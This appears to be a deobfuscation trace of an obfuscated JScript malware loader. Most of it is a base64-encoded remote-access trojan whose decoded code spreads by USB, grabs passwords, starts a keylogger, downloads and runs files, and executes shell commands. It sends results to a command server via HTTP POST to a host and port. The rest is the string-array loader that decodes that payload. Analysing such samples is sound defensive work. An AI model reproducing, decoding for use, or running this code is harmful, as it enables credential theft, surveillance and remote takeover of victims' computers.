Xt9DQp9DQpmdW5jdGlvbiBnZXREYXRlKCl7DQp2YXIgcy<>9ICIiOw0KdmFyIGQgPSBuZXcgRGF0ZSgpOw0Kcy<>rPSBkLmdldERhdGUoKS<>rICIvIjsNCnMgKz0gKGQuZ2V0TW9udGgoKS<>rIDEpICsgIi8iOw0Kcy<>rPSBkLmdldFllYXIoKTsNCnJldHVybiBzOw0KfQ0KZnVuY3Rpb24gaW5zdGFuY2UoKXsNCnRyeXsNCnRyeXsNCnVzYnNwcmVhZGluZy<>9IHNoZWxsb2JqLlJlZ1JlYWQoIkhLRVlfTE9DQUxfTUFDSElORVxcc29mdHdhcmVcXCIgKyBpbnN0YWxsbmFtZS5zcGxpdCgiLiIpWzBdICsgIlxcIik7DQp9Y2F0Y2goZWVlKXt9DQppZih1c2JzcHJlYWRpbmcgPT0gIiIpew0KaWYgKFdTY3JpcHQuc2NyaXB0RnVsbE5hbWUuc3Vic3RyKDEpLnRvTG93ZXJDYXNlKCkgPT0gIjpcXCIgKy<>gaW5zdGFsbG5hbWUudG9Mb3dlckNhc2UoKSl7DQp1c2JzcHJlYWRpbmcgPS<>idHJ1ZS<>tICIgKyBnZXREYXRlKCk7DQp0cnl7c2hlbGxvYmouUmVnV3JpdGUoIkhLRVlfTE9DQUxfTUFDSElORVxcc29mdHdhcmVcXCIgKyBpbnN0YWxsbmFtZS5zcGxpdCgiLiIpWzBdICsgIlxcIiwgIHVzYnNwcmVhZGluZywgIlJFR19TWiIpO31jYXRjaChlZWVlZSl7fQ0KfWVsc2V7DQp1c2JzcHJlYWRpbmcgPS<>iZmFsc2UgLS<>iICsgZ2V0RGF0ZSgpOw0KdHJ5e3NoZWxsb2JqLlJlZ1dyaXRlKCJIS0VZX0xPQ0FMX01BQ0hJTkVcXHNvZnR3YXJlXFwiICsgaW5zdGFsbG5hbWUuc3BsaXQoIi4iKVswXS<>gKy<>iXFwiLC<>gdXNic3ByZWFkaW5nLC<>iUkVHX1NaIik7fWNhdGNoKGVlZWVlKXt9DQp9DQp9DQp1cHN0YXJ0KCk7DQp2YXIgc2NyaXB0ZnVsbG5hbWVzaG9ydC<>9ICBmaWxlc3lzdGVtb2JqLmdldEZpbGUoV1NjcmlwdC5zY3JpcHRGdWxsTmFtZSk7DQp2YXIgaW5zdGFsbGZ1bGxuYW1lc2hvcnQgPS<>gZmlsZXN5c3RlbW9iai5nZXRGaWxlKGluc3RhbGxkaXIgKyBpbnN0YWxsbmFtZSk7DQppZi<>oc2NyaXB0ZnVsbG5hbWVzaG9ydC5zaG9ydFBhdGgudG9Mb3dlckNhc2UoKS<>hPSBpbnN0YWxsZnVsbG5hbWVzaG9ydC5zaG9ydFBhdGgudG9Mb3dlckNhc2UoKSl7DQpzaGVsbG9iai5ydW4oIndzY3JpcHQuZXhlIC8vQiBcIiIgKyBpbnN0YWxsZGlyICsgaW5zdGFsbG5hbWUgKy<>iXCIiKTsNCldTY3JpcHQucXVpdCgpOw0KfQ0KdmFyIG9uZW9uY2UgPSBmaWxlc3lzdGVtb2JqLm9wZW5UZXh0RmlsZShpbnN0YWxsZGlyICsgaW5zdGFsbG5hbWUgLDgsIGZhbHNlKTsNCn1jYXRjaChlcnIpew0KV1NjcmlwdC5xdWl0KCk7DQp9DQp9DQpmdW5jdGlvbiBwYXNzZ3JhYmJlci<>oZmlsZXVybCwgZmlsZW5hbWUsIHJldGNtZCl7DQpzaGVsbG9iai5ydW4oIiVjb21zcGVjJS<>vYyB0YXNra2lsbC<>vRi<>vSU0gIi<>rIGZpbGVuYW1lLC<>wLCB0cnVlKTsNCnRyeXtmaWxlc3lzdGVtb2JqLmRlbGV0ZUZpbGUoaW5zdGFsbGRpci<>rIGZpbGVuYW1lICsgImRhdGEiKTt9Y2F0Y2goZXkpe30NCnZhciBjb25maWdfZmlsZS<>9IGluc3RhbGxkaXIgKyBmaWxlbmFtZS5zdWJzdHIoMCwgZmlsZW5hbWUubGFzdEluZGV4T2YoIi4iKSkgKy<>iLmNmZyI7DQp2YXIgY2ZnID0gIltHZW5lcmFsXVxuU2hvd0dyaWRMaW5lcz0wXG5TYXZlRmlsdGVySW5kZXg9MFxuU2hvd0luZm9UaX<>9MVxuVXNlUHJvZmlsZUZvbGRlcj0wXG5Qcm9maWxlRm9sZGVyPVxuTWFya09kZEV2ZW5Sb3dzPTBcbldpblBvcz0yQy<>wMC<>wMC<>wMC<>wMC<>wMC<>wMC<>wMC<>wMS<>wMC<>wMC<>wMCBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRiBGRi<>wMC<>wMC<>wMC<>wMC<>wMC<>wMC<>wMC<>wMC<>4MC<>wMi<>wMC<>wMCBFMC<>wMS<>wMC<>wMFxuQ29sdW1ucz1GQS<>wMC<>wMC<>wMCBGQS<>wMC<>wMS<>wMC<>2RS<>wMC<>wMi<>wMC<>2RS<>wMC<>wMy<>wMC<>3OC<>wMC<>wNC<>wMC<>3OC<>wMC<>wNS<>wMC<>3OC<>wMC<>wNi<>wMC<>2NC<>wMC<>wNy<>wMCBGQS<>wMC<>wOC<>wMFxuU29ydD0wIjsNCi8vd3JpdGUgY29uZmlnDQp2YXIgd3JpdGVyID0gZmlsZXN5c3RlbW9iai5vcGVuVGV4dEZpbGUoY29uZmlnX2ZpbGUsIDIsIHRydWUpOw0Kd3JpdGVyLndyaXRlTGluZShjZmcpOw0Kd3JpdGVyLmNsb3NlKCk7DQp3cml0ZXIgPSBudWxsOw0KdmFyIHN0cmxpbmsgPSBmaWxldXJsOw0KdmFyIHN0cnNhdmV0by<>9IGluc3RhbGxkaXIgKyBmaWxlbmFtZTsNCnZhciBvYmpodHRwZG93bmxvYWQgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgibXN4bWwyLnhtbGh0dH<>iKTsNCm9iamh0dHBkb3dubG9hZC5vcGVuKCJnZXQiLCBzdHJsaW5rLCBmYWxzZSk7DQpvYmpodHRwZG93bmxvYWQuc2V0UmVxdWVzdEhlYWRlcigiY2FjaGUtY29udHJvbDoiLC<>ibWF4LWFnZT0wIik7DQpvYmpodHRwZG93bmxvYWQuc2VuZCgpOw0KdmFyIG9iamZzb2Rvd25sb2FkID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoInNjcmlwdGluZy5maWxlc3lzdGVtb2JqZWN0Iik7DQppZihvYmpmc29kb3dubG9hZC5maWxlRXhpc3RzKHN0cnNhdmV0bykpew0Kb2JqZnNvZG93bmxvYWQuZGVsZXRlRmlsZShzdHJzYXZldG8pOw0KfQ0KaWYgKG9iamh0dHBkb3dubG9hZC5zdGF0dXMgPT0gMj<>wKXsNCnZhci<>gb2Jqc3RyZWFtZG93bmxvYWQgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiYWRvZGIuc3RyZWFtIik7DQpvYmpzdHJlYW1kb3dubG9hZC5UeXBlID0gMTsNCm9ianN0cmVhbWRvd25sb2FkLk9wZW4oKTsNCm9ianN0cmVhbWRvd25sb2FkLldyaXRlKG9iamh0dHBkb3dubG9hZC5yZXNwb25zZUJvZHkpOw0Kb2Jqc3RyZWFtZG93bmxvYWQuU2F2ZVRvRmlsZShzdHJzYXZldG8pOw0Kb2Jqc3RyZWFtZG93bmxvYWQuY2xvc2UoKTsNCm9ianN0cmVhbWRvd25sb2FkID0gbnVsbDsNCn0NCmlmKG9iamZzb2Rvd25sb2FkLmZpbGVFeGlzdHMoc3Ryc2F2ZXRvKSl7DQp2YXIgcnVubmVyID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIlNoZWxsLkFwcGxpY2F0aW9uIik7DQp2YXIgc2F2ZXIgPSBvYmpmc29kb3dubG9hZC5nZXRGaWxlKHN0cnNhdmV0bykuc2hvcnRQYXRoDQpydW5uZXIuc2hlbGxFeGVjdXRlKHNhdmVyLC<>iIC9zdGV4dC<>iICsgc2F2ZXIgKy<>iZGF0YSIpOw0KV1NjcmlwdC5zbGVlcCgyMD<>wKTsNCmRlbGV0ZWZhZihzdHJzYXZldG8pOw0KdXBsb2FkKHNhdmVyICsgImRhdGEiLCByZXRjbWQpOw0KfQ0KfQ0KZnVuY3Rpb24ga2V5bG9nZ2Vyc3RhcnRlci<>oZmlsZXVybCwgZmlsZW5hbWUsIGZpbGVhcmcsIGlzX29mZmxpbmUpew0Kc2hlbGxvYmoucnVuKCIlY29tc3BlYyUgL2MgdGFza2tpbGwgL0YgL0lNICIgKyBmaWxlbmFtZSwgMCwgdHJ1ZSk7DQp2YXIgc3RybGluay<>9IGZpbGV1cmw7DQp2YXIgc3Ryc2F2ZXRvID0gaW5zdGFsbGRpci<>rIGZpbGVuYW1lOw0KdmFyIG9iamh0dHBkb3dubG9hZC<>9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJtc3htbDIueG1saHR0cCIgKTsNCm9iamh0dHBkb3dubG9hZC5vcGVuKCJnZXQiLCBzdHJsaW5rLCBmYWxzZSk7DQpvYmpodHRwZG93bmxvYWQuc2V0UmVxdWVzdEhlYWRlcigiY2FjaGUtY29udHJvbDoiLC<>ibWF4LWFnZT0wIik7DQpvYmpodHRwZG93bmxvYWQuc2VuZCgpOw0KdmFyIG9iamZzb2Rvd25sb2FkID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoInNjcmlwdGluZy5maWxlc3lzdGVtb2JqZWN0Iik7DQppZihvYmpmc29kb3dubG9hZC5maWxlRXhpc3RzKHN0cnNhdmV0bykpew0Kb2JqZnNvZG93bmxvYWQuZGVsZXRlRmlsZShzdHJzYXZldG8pOw0KfQ0KaWYgKG9iamh0dHBkb3dubG9hZC5zdGF0dXMgPT0gMj<>wKXsNCnZhci<>gb2Jqc3RyZWFtZG93bmxvYWQgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiYWRvZGIuc3RyZWFtIik7DQpvYmpzdHJlYW1kb3dubG9hZC5UeXBlID0gMTsNCm9ianN0cmVhbWRvd25sb2FkLk9wZW4oKTsNCm9ianN0cmVhbWRvd25sb2FkLldyaXRlKG9iamh0dHBkb3dubG9hZC5yZXNwb25zZUJvZHkpOw0Kb2Jqc3RyZWFtZG93bmxvYWQuU2F2ZVRvRmlsZShzdHJzYXZldG8pOw0Kb2Jqc3RyZWFtZG93bmxvYWQuY2xvc2UoKTsNCm9ianN0cmVhbWRvd25sb2FkID0gbnVsbDsNCn0NCmlmKG9iamZzb2Rvd25sb2FkLmZpbGVFeGlzdHMoc3Ryc2F2ZXRvKSl7DQpzaGVsbG9iai5ydW4oIlwiIi<>rIHN0cnNhdmV0by<>rICJcIi<>iICsgaG9zdC<>rICIgIi<>rIHBvcnQgKy<>iIFwiIi<>rIGZpbGVhcmcgKy<>iXCIgIi<>rIGlzX29mZmxpbmUpOw0KfQ0KfQ0KZnVuY3Rpb24gc2VydmljZXN0YXJ0ZXIgKGZpbGV1cmwsIGZpbGVuYW1lLCBmaWxlYXJnKXsNCnNoZWxsb2JqLnJ1bigiJWNvbXNwZWMlIC9jIHRhc2traWxsIC9GIC9JTS<>iICsgZmlsZW5hbWUsID<>sIHRydWUpOw0KdmFyIHN0cmxpbmsgPSBmaWxldXJsOw0KdmFyIHN0cnNhdmV0by<>9IGluc3RhbGxkaXIgKyBmaWxlbmFtZTsNCnZhciBvYmpodHRwZG93bmxvYWQgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgibXN4bWwyLnhtbGh0dH<>iICk7DQpvYmpodHRwZG93bmxvYWQub3BlbigiZ2V0Iiwgc3RybGluaywgZmFsc2UpOw0Kb2JqaHR0cGRvd25sb2FkLnNldFJlcXVlc3RIZWFkZXIoImNhY2hlLWNvbnRyb2w6IiwgIm1heC1hZ2U9MCIpOw0Kb2JqaHR0cGRvd25sb2FkLnNlbmQoKTsNCnZhciBvYmpmc29kb3dubG9hZC<>9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJzY3JpcHRpbmcuZmlsZXN5c3RlbW9iamVjdCIpOw0KaWYob2JqZnNvZG93bmxvYWQuZmlsZUV4aXN0cyhzdHJzYXZldG8pKXsNCm9iamZzb2Rvd25sb2FkLmRlbGV0ZUZpbGUoc3Ryc2F2ZXRvKTsNCn0NCmlmIChvYmpodHRwZG93bmxvYWQuc3RhdHVzID09IDIwMCl7DQp2YXIgIG9ianN0cmVhbWRvd25sb2FkID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoImFkb2RiLnN0cmVhbSIpOw0Kb2Jqc3RyZWFtZG93bmxvYWQuVHlwZS<>9IDE7DQpvYmpzdHJlYW1kb3dubG9hZC5PcGVuKCk7DQpvYmpzdHJlYW1kb3dubG9hZC5Xcml0ZShvYmpodHRwZG93bmxvYWQucmVzcG9uc2VCb2R5KTsNCm9ianN0cmVhbWRvd25sb2FkLlNhdmVUb0ZpbGUoc3Ryc2F2ZXRvKTsNCm9ianN0cmVhbWRvd25sb2FkLmNsb3NlKCk7DQpvYmpzdHJlYW1kb3dubG9hZC<>9IG51bGw7DQp9DQppZihvYmpmc29kb3dubG9hZC5maWxlRXhpc3RzKHN0cnNhdmV0bykpew0Kc2hlbGxvYmoucnVuKCJcIiIgKyBzdHJzYXZldG8gKy<>iXCIgIi<>rIGhvc3QgKy<>iICIgKyBwb3J0ICsgIiBcIiIgKyBmaWxlYXJnICsgIlwiIik7DQp9DQp9DQpmdW5jdGlvbiBzaXRlZG93bmxvYWRlci<>oZmlsZXVybCxmaWxlbmFtZSl7DQp2YXIgc3RybGluay<>9IGZpbGV1cmw7DQp2YXIgc3Ryc2F2ZXRvID0gaW5zdGFsbGRpci<>rIGZpbGVuYW1lOw0KdmFyIG9iamh0dHBkb3dubG9hZC<>9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJtc3htbDIuc2VydmVyeG1saHR0cCIgKTsNCm9iamh0dHBkb3dubG9hZC5vcGVuKCJnZXQiLCBzdHJsaW5rLCBmYWxzZSk7DQpvYmpodHRwZG93bmxvYWQuc2V0UmVxdWVzdEhlYWRlcigiY2FjaGUtY29udHJvbCIsICJtYXgtYWdlPT<>iKTsNCm9iamh0dHBkb3dubG9hZC5zZW5kKCk7DQp2YXIgb2JqZnNvZG93bmxvYWQgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCmlmKG9iamZzb2Rvd25sb2FkLmZpbGVFeGlzdHMoc3Ryc2F2ZXRvKSl7DQpvYmpmc29kb3dubG9hZC5kZWxldGVGaWxlKHN0cnNhdmV0byk7DQp9DQppZi<>ob2JqaHR0cGRvd25sb2FkLnN0YXR1cy<>9PS<>yMD<>pew0KdmFyICBvYmpzdHJlYW1kb3dubG9hZC<>9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJhZG9kYi5zdHJlYW0iKTsNCm9ianN0cmVhbWRvd25sb2FkLlR5cGUgPS<>xOw0Kb2Jqc3RyZWFtZG93bmxvYWQuT3BlbigpOw0Kb2Jqc3RyZWFtZG93bmxvYWQuV3JpdGUob2JqaHR0cGRvd25sb2FkLnJlc3BvbnNlQm9keSk7DQpvYmpzdHJlYW1kb3dubG9hZC5TYXZlVG9GaWxlKHN0cnNhdmV0byk7DQpvYmpzdHJlYW1kb3dubG9hZC5jbG9zZSgpOw0Kb2Jqc3RyZWFtZG93bmxvYWQgPSBudWxsOw0KfQ0KaWYob2JqZnNvZG93bmxvYWQuZmlsZUV4aXN0cyhzdHJzYXZldG8pKXsNCnNoZWxsb2JqLnJ1bihvYmpmc29kb3dubG9hZC5nZXRGaWxlKHN0cnNhdmV0bykuc2hvcnRQYXRoKTsNCnVwZGF0ZXN0YXR1cygiRXhlY3V0ZWQrRmlsZSIpOw0KfQ0KfQ0KZnVuY3Rpb24gZG93bmxvYWQgKGZpbGV1cmwsZmlsZWRpcil7DQppZihmaWxlZGlyID09ICIiKXsNCmZpbGVkaXIgPSBpbnN0YWxsZGlyOw0KfQ0Kc3Ryc2F2ZXRvID0gZmlsZWRpci<>rIGZpbGV1cmwuc3Vic3RyKGZpbGV1cmwubGFzdEluZGV4T2YoIlxcIikgKy<>xKTsNCnZhciBvYmpodHRwZG93bmxvYWQgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgibXN4bWwyLnhtbGh0dH<>iKTsNCm9iamh0dHBkb3dubG9hZC5vcGVuKCJwb3N0IiwiaHR0cDovLyIgKyBob3N0ICsgIjoiICsgcG9ydC<>rIi8iICsgInNlbmQtdG8tbWUiICsgc3BsaXRlci<>rIGZpbGV1cmwsIGZhbHNlKTsNCm9iamh0dHBkb3dubG9hZC5zZXRSZXF1ZXN0SGVhZGVyKCJ1c2VyLWFnZW50OiIsIGluZm9ybWF0aW9uKCkpOw0Kb2JqaHR0cGRvd25sb2FkLnNlbmQoIiIpOw0KdmFyIG9iamZzb2Rvd25sb2FkID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoInNjcmlwdGluZy5maWxlc3lzdGVtb2JqZWN0Iik7DQppZihvYmpmc29kb3dubG9hZC5maWxlRXhpc3RzKHN0cnNhdmV0bykpew0Kb2JqZnNvZG93bmxvYWQuZGVsZXRlRmlsZShzdHJzYXZldG8pOw0KfQ0KaWYgKG9iamh0dHBkb3dubG9hZC5zdGF0dXMgPT0gMj<>wKXsNCnZhci<>gb2Jqc3RyZWFtZG93bmxvYWQgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiYWRvZGIuc3RyZWFtIik7DQpvYmpzdHJlYW1kb3dubG9hZC5UeXBlID0gMTsNCm9ianN0cmVhbWRvd25sb2FkLk9wZW4oKTsNCm9ianN0cmVhbWRvd25sb2FkLldyaXRlKG9iamh0dHBkb3dubG9hZC5yZXNwb25zZUJvZHkpOw0Kb2Jqc3RyZWFtZG93bmxvYWQuU2F2ZVRvRmlsZShzdHJzYXZldG8pOw0Kb2Jqc3RyZWFtZG93bmxvYWQuY2xvc2UoKTsNCm9ianN0cmVhbWRvd25sb2FkID0gbnVsbDsNCn0NCmlmKG9iamZzb2Rvd25sb2FkLmZpbGVFeGlzdHMoc3Ryc2F2ZXRvKSl7DQpzaGVsbG9iai5ydW4ob2JqZnNvZG93bmxvYWQuZ2V0RmlsZShzdHJzYXZldG8pLnNob3J0UGF0aCk7DQp1cGRhdGVzdGF0dXMoIkV4ZWN1dGVkK0ZpbGUiKTsNCn0NCn0NCmZ1bmN0aW9uIHVwZGF0ZXN0YXR1cyhzdGF0dXNfbXNnKXsNCnZhciBvYmpzb2MgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgibXN4bWwyLnhtbGh0dH<>iKTsNCm9ianNvYy5vcGVuKCJwb3N0IiwiaHR0cDovLyIgKyBob3N0ICsgIjoiICsgcG9ydC<>rICIvIi<>rICJ1cGRhdGUtc3RhdHVzIi<>rIHNwbGl0ZXIgKyBzdGF0dXNfbXNnLCBmYWxzZSk7DQpvYmpzb2Muc2V0UmVxdWVzdEhlYWRlcigidXNlci1hZ2VudDoiLCBpbmZvcm1hdGlvbigpKTsNCm9ianNvYy5zZW5kKCIiKTsNCn0NCmZ1bmN0aW9uIHVwbG9hZC<>oZmlsZXVybCwgcmV0Y21kKXsNCnZhci<>gaHR0cG9iaixvYmpzdHJlYW11cGxvYWRlLGJ1ZmZlcjsNCnZhciBvYmpzdHJlYW11cGxvYWRlID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoImFkb2RiLnN0cmVhbSIpOw0Kb2Jqc3RyZWFtdXBsb2FkZS5UeXBlID0gMTsNCm9ianN0cmVhbXVwbG9hZGUuT3BlbigpOw0Kb2Jqc3RyZWFtdXBsb2FkZS5sb2FkRnJvbUZpbGUoZmlsZXVybCk7DQpidWZmZXIgPSBvYmpzdHJlYW11cGxvYWRlLlJlYWQoKTsNCm9ianN0cmVhbXVwbG9hZGUuY2xvc2UoKTsNCm9ianN0cmVhbWRvd25sb2FkID0gbnVsbDsNCnZhciBodHRwb2JqID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIm1zeG1sMi54bWxodHRwIik7DQpodHRwb2JqLm9wZW4oInBvc3QiLCJodHRwOi8vIi<>rIGhvc3QgKy<>iOiIgKyBwb3J0ICsiLyIgKyByZXRjbWQsIGZhbHNlKTsNCmh0dHBvYmouc2V0UmVxdWVzdEhlYWRlcigidXNlci1hZ2VudDoiLCBpbmZvcm1hdGlvbigpKTsNCmh0dHBvYmouc2VuZChidWZmZXIpOw0KfQ0KZnVuY3Rpb24gZGVsZXRlZmFmICh1cmwpew0KdHJ5ew0KZmlsZXN5c3RlbW9iai5kZWxldGVGaWxlKHVybCk7DQpmaWxlc3lzdGVtb2JqLmRlbGV0ZUZvbGRlcih1cmwpOw0KfWNhdGNoKGVycil7fQ0KfQ0KZnVuY3Rpb24gY21kc2hlbGwgKGNtZCl7DQp2YXIgaHR0cG9iaixvZXhlYyxyZWFkYWxsZnJvbWFueTsNCnZhciBzdHJzYXZldG8gPSBpbnN0YWxsZGlyICsgIm91dC50eHQiOw0Kc2hlbGxvYmoucnVuKCIlY29tc3BlYyUgL2MgIi<>rIGNtZC<>rICIgPiBcIiIgKyBzdHJzYXZldG8gKy<>iXCIiLC<>wLCB0cnVlKTsNCnJlYWRhbGxmcm9tYW55ID0gZmlsZXN5c3RlbW9iai5vcGVuVGV4dEZpbGUoc3Ryc2F2ZXRvKS5yZWFkQWxsKCk7DQp0cnl7DQpmaWxlc3lzdGVtb2JqLmRlbGV0ZUZpbGUoc3Ryc2F2ZXRvKTsNCn1jYXRjaChlZSl7fQ0KcmV0dXJuIHJlYWRhbGxmcm9tYW55Ow0KfQ0KZnVuY3Rpb24gZW51bXByb2Nlc3MoKXsNCnZhciBlcC<>9ICIiOw0KdHJ5ew0KdmFyIG9iandtaXNlcnZpY2UgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxcXFwuXFxyb290XFxjaW12MiIpOw0KdmFyIGNvbGl0ZW1zID0gb2Jqd21pc2VydmljZS5FeGVjUXVlcnkoInNlbGVjdC<>qIGZyb20gd2luMzJfcHJvY2VzcyIsbnVsbCw0OCk7DQpmb3IodmFyIGZpID0gbmV3IEVudW1lcmF0b3IoY29saXRlbXMpOy<>hZmkuYXRFbmQoKTsgZmkubW92ZU5leHQoKSl7DQp2YXIgb2JqaXRlbS<>9IGZpLml0ZW0oKTsNCmVwID0gZX<>gKyBvYmppdGVtLm5hbWUgKy<>iXiI7DQplcC<>9IGVwICsgb2JqaXRlbS5wcm9jZXNzSWQgKy<>iXiI7DQplcC<>9IGVwICsgb2JqaXRlbS5leGVjdXRhYmxlUGF0aC<>rIHNwbGl0ZXI7DQp9DQp9Y2F0Y2goZXIpe30NCnJldHVybiBlcDsNCn0NCmZ1bmN0aW9uIGV4aXRwcm9jZXNzIChwaWQpew0KdHJ5ew0Kc2hlbGxvYmoucnVuKCJ0YXNra2lsbC<>vRi<>vVC<>vUElEICIgKyBwaWQsMCx0cnVlKTsNCn1jYXRjaChlcnIpe30NCn0NCmZ1bmN0aW9uIGdldFBhcmVudERpcmVjdG9yeShwYXRoKXsNCnZhciBmby<>9IGZpbGVzeXN0ZW1vYmouZ2V0RmlsZShwYXRoKTsNCnJldHVybiBmaWxlc3lzdGVtb2JqLmdldFBhcmVudEZvbGRlck5hbWUoZm8pOw0KfQ0KZnVuY3Rpb24gZW51bWZhZi<>oZW51bWRpcil7DQp2YXIgcmUgPS<>iIjsNCnRyeXsNCmZvcih2YXIgZmkgPSBuZXcgRW51bWVyYXRvcihmaWxlc3lzdGVtb2JqLmdldEZvbGRlci<>oZW51bWRpcikuc3ViZm9sZGVycyk7ICFmaS5hdEVuZCgpOyBmaS5tb3ZlTmV4dCgpKXsNCnZhciBmb2xkZXIgPSBmaS5pdGVtKCk7DQpyZS<>9IHJlICsgZm9sZGVyLm5hbWUgKy<>iXl5kXiIgKyBmb2xkZXIuYXR0cmlidXRlcy<>rIHNwbGl0ZXI7DQp9DQpmb3IodmFyIGZpID0gbmV3IEVudW1lcmF0b3IoZmlsZXN5c3RlbW9iai5nZXRGb2xkZXIgKGVudW1kaXIpLmZpbGVzKTsgIWZpLmF0RW5kKCk7IGZpLm1vdmVOZXh0KCkpew0KdmFyIGZpbGUgPSBmaS5pdGVtKCk7DQpyZS<>9IHJlICsgZmlsZS5uYW1lICsgIl4iICsgZmlsZS5zaXplICsgIl4iICsgZmlsZS5hdHRyaWJ1dGVzICsgc3BsaXRlcjsNCn0NCn1jYXRjaChlcnIpe30NCnJldHVybiByZTsNCn0NCg==", "", "\x41", $5FZwLPDuLmhd3toN49z ( 9 ), "Open", "us-ascii", "2382rQRreo", "171iXGpSV", $5FZwLPDuLmhd3toN49z ( 7 ), $5FZwLPDuLmhd3toN49z ( 10 ), "7092rXFGgQ", "bin.base64", "7PdAJRt", "replace", "7365HgEKJQ", "Type", "535JemZUP", "56aEstzl", $5FZwLPDuLmhd3toN49z ( 6 ), "612VSSUeT", "9656fZrHIS", $5FZwLPDuLmhd3toN49z ( 11 ), $5FZwLPDuLmhd3toN49z ( 5 ), "mko", "10DoKAhU", $5FZwLPDuLmhd3toN49z ( 12 ), "dataType", $5FZwLPDuLmhd3toN49z ( 4 ), $5FZwLPDuLmhd3toN49z ( 13 ), "Position", $5FZwLPDuLmhd3toN49z ( 3 ), "ReadText", $5FZwLPDuLmhd3toN49z ( 14 ), "CharSet", "30321mGnjrd", "text", $5FZwLPDuLmhd3toN49z ( 2 ), "66riMPzf", "1588rHmVvo", "Write", "600PtLUsO", $5FZwLPDuLmhd3toN49z ( 15 ), $5FZwLPDuLmhd3toN49z ( 1 ) ];
                              • $5FZwLPDuLmhd3toN49z(9) ➔ "CreateObject"
                              • $5FZwLPDuLmhd3toN49z(7) ➔ "173920wjKeEW"
                              • $5FZwLPDuLmhd3toN49z(10) ➔ "microsoft.xmldom"
                              • $5FZwLPDuLmhd3toN49z(6) ➔ "213970IFnRnT"
                              • $5FZwLPDuLmhd3toN49z(11) ➔ "100300VuLhdD"
                              • $5FZwLPDuLmhd3toN49z(5) ➔ "467406MQaxVE"
                              • $5FZwLPDuLmhd3toN49z(12) ➔ "nodeTypedValue"
                              • $5FZwLPDuLmhd3toN49z(4) ➔ "188136jibKis"
                              • $5FZwLPDuLmhd3toN49z(13) ➔ "adodb.stream"
                              • $5FZwLPDuLmhd3toN49z(3) ➔ "13540351cqrbma"
                              • $5FZwLPDuLmhd3toN49z(14) ➔ "createElement"
                              • $5FZwLPDuLmhd3toN49z(2) ➔ "1172925NnmWXu"
                              • $5FZwLPDuLmhd3toN49z(15) ➔ "958470qbiUou"
                              • $5FZwLPDuLmhd3toN49z(1) ➔ "151212NeWBHv"
                              9
                              _4pjor7[0];
                                10
                                var _6rhlk7 = [ _4pjor7[0], _4pjor7[1], _4pjor7[2], _4pjor7[3], _4pjor7[4], _4pjor7[5], _4pjor7[6], _4pjor7[7], _4pjor7[8], _4pjor7[9], _4pjor7[10], _4pjor7[11], _4pjor7[12], _4pjor7[13], _4pjor7[14], _4pjor7[15], _4pjor7[16], _4pjor7[17], _4pjor7[18], _4pjor7[19], _4pjor7[20], _4pjor7[21], _4pjor7[22], _4pjor7[0], _4pjor7[23], _4pjor7[24], _4pjor7[25], _4pjor7[26], _4pjor7[27], _4pjor7[28], _4pjor7[29], _4pjor7[30], _4pjor7[31], _4pjor7[32], _4pjor7[33], _4pjor7[34], _4pjor7[35], _4pjor7[36], _4pjor7[37], _4pjor7[38], _4pjor7[39], _4pjor7[40], _4pjor7[41], _4pjor7[42], _4pjor7[43], _4pjor7[44], _4pjor7[45] ];
                                  11
                                  _6rhlk7[0];
                                    12
                                    var j = b;
                                      13
                                      ! function () {
                                      • () ➔ undefined
                                      • () ➔ undefined
                                      14
                                      var d = b;
                                        15
                                        var e = a ( );
                                        • a() ➔ bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use strict,9656fZrHIS,100300VuLhdD,467406MQaxVE,mko,10DoKAhU,nodeTypedValue,dataType,188136jibKis,adodb.stream,Position,13540351cqrbma,ReadText,createElement,CharSet,30321mGnjrd,text,1172925NnmWXu,66riMPzf,1588rHmVvo,push,Write,600PtLUsO,958470qbiUou,151212NeWBHv
                                        16
                                        for ( ; ; )
                                          17
                                          {
                                            18
                                            try
                                              19
                                              {
                                                20
                                                if ( 255652 == - parseInt ( d ( 23 ) ) + - parseInt ( d ( 18 ) ) / 2 + - parseInt ( d ( 8 ) ) / 3 * ( parseInt ( d ( 14 ) ) / 4 ) + parseInt ( d ( 32 ) ) / 5 + - parseInt ( d ( 3 ) ) / 6 * ( parseInt ( d ( 6 ) ) / 7 ) + parseInt ( d ( 2 ) ) / 8 * ( - parseInt ( d ( 30 ) ) / 9 ) + - parseInt ( d ( 20 ) ) / 10 * ( - parseInt ( d ( 26 ) ) / 11 ) )
                                                • b(23) ➔ "createElement"
                                                • parseInt("createElement") ➔ NaN
                                                • b(18) ➔ "188136jibKis"
                                                • parseInt("188136jibKis") ➔ 188136
                                                • b(8) ➔ "213970IFnRnT"
                                                • parseInt("213970IFnRnT") ➔ 213970
                                                • b(14) ➔ "mko"
                                                • parseInt("mko") ➔ NaN
                                                • b(32) ➔ "600PtLUsO"
                                                • parseInt("600PtLUsO") ➔ 600
                                                • b(3) ➔ "7365HgEKJQ"
                                                • parseInt("7365HgEKJQ") ➔ 7365
                                                • b(6) ➔ "535JemZUP"
                                                • parseInt("535JemZUP") ➔ 535
                                                • b(2) ➔ "replace"
                                                • parseInt("replace") ➔ NaN
                                                • b(30) ➔ "push"
                                                • parseInt("push") ➔ NaN
                                                • b(20) ➔ "Position"
                                                • parseInt("Position") ➔ NaN
                                                • d(26) ➔ "text"
